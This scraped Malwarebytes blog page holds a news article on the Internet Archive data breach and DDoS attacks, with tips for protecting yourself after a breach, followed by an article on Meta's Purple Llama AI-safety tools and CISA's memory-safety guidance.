Who stole the database and why is not yet known. An unverified source told Malwarebytes that login credentials for the Azure servers of the Internet Archive were found in an information stealer log shared on the Dark Web, which could have offered someone the opportunity for a minimum-effort attack.

To pile more grief onto the breach, a “hacktivist” group calling themselves SN\_BLACKMETA has launched several DDoS attacks against Internet Archive’s website archive.org for all the wrong reasons.

Their tweet which explains their motivation hasn’t gone down well among X users, with many commenting that the Internet Archive is not connected to the US Government and, in fact, a very useful tool.

Since the objective behind the DDoS attacks is no doubt attention-seeking, it is unlikely that the same group is behind the data breach as they haven’t claimed responsibility.

Internet Archive founder Brewster Kahle posted an update on X:

> What we know: DDOS attack–fended off for now; defacement of our website via JS library; breach of usernames/email/salted-encrypted passwords.
> 
> What we’ve done: Disabled the JS library, scrubbing systems, upgrading security.
> 
> Will share more as we know it.

For now, anyone who suspects they’re affected by the data breach should follow our tips below. We’ll keep you updated on any developments in the story.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

 Internet Archive suffers data breach and DDoS 

Meta's Project Llama aims to help developers filter out specific items that might cause their AI model to produce inappropriate content.

Meta has announced Purple Llama, a project that aims to “bring together tools and evaluations to help the community build responsibly with open generative AI models.”

Generative Artificial Intelligence (AI) models have been around for years and their main function, compared to older AI models is that they can process more types of input. Take for example the older models that were used to determine whether a file was malware or not. The input is limited to files and the output usually comes in the form of a percentage. (e.g. The chance that this file is malicious is 90%. ).

Generative AI models are capable of sorting through more types of information. Take for example Large Language Models (LLMs) that can process text, images, videos, songs, diagrams, webinars, computer code, and other similar types of input.

Generative AI models are the closest to human creativity we can get at this point in time. As such, generative AI has brought about a new wave of innovations. It enables us to have a conversation with models like ChatGPT, create images based on instructions, and summarize large amounts of text(s). It can even write papers to the point where scientists have a hard time telling them apart from human work.

According to Meta’s statement:

> “Collaboration on safety will build trust in the developers driving this new wave of innovation, and requires additional research and contributions on responsible AI.”

For this reason, Meta is collaborating in project Purple Llama with other AI application developers like Microsoft and cloud platforms like AWS and Google Cloud, and chip designers like Intel, AMD, and Nvidia.

LLMs can generate code, that fails to follow security best practices or introduce exploitable vulnerabilities. Given that GitHub recently proudly touted that 46% of code is produced with the help of their CoPilot AI, this is far from just a theoretical risk.

So, it makes sense that the first step in project Purple Llama focuses on tools to test cyber security issues in software-generating models. This package allows developers to run benchmark tests to check how likely it is for an AI model to generate insecure code or assist users in carrying out cyberattacks.

The package is introduced under the name CyberSecEval, a comprehensive benchmark developed to help bolster the cybersecurity of LLMs employed as coding assistants. Initial tests showed that on average, LLMs suggested vulnerable code 30% of the time.

To check and filter all the inputs and outputs of a LLM, Meta released Llama Guard. Llama Guard is a freely available model that provides developers with a pretrained model to help defend against generating potentially risky outputs. The model has been trained on a mix of publicly available datasets to help find common types of potentially risky, or violating content. This will allow developers to filter out specific items that might cause a model to produce inappropriate content.

The announcement has come at the same time as the Cybersecurity & Infrastructure Security Agency (CISA) has published a guide setting out The case for memory safe roadmaps. In its guidance, CISA attempts to provide manufacturers with steps they can take towards creating and publishing memory safe roadmaps as part of the international Secure by Design campaign.

Memory safety vulnerabilities are a class of well-known and common coding errors that cybercriminals exploit quite often. Coding errors that could increase in numbers unless we take steps toward using memory safe programming languages and use the methods to check the code generated by LLMs.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us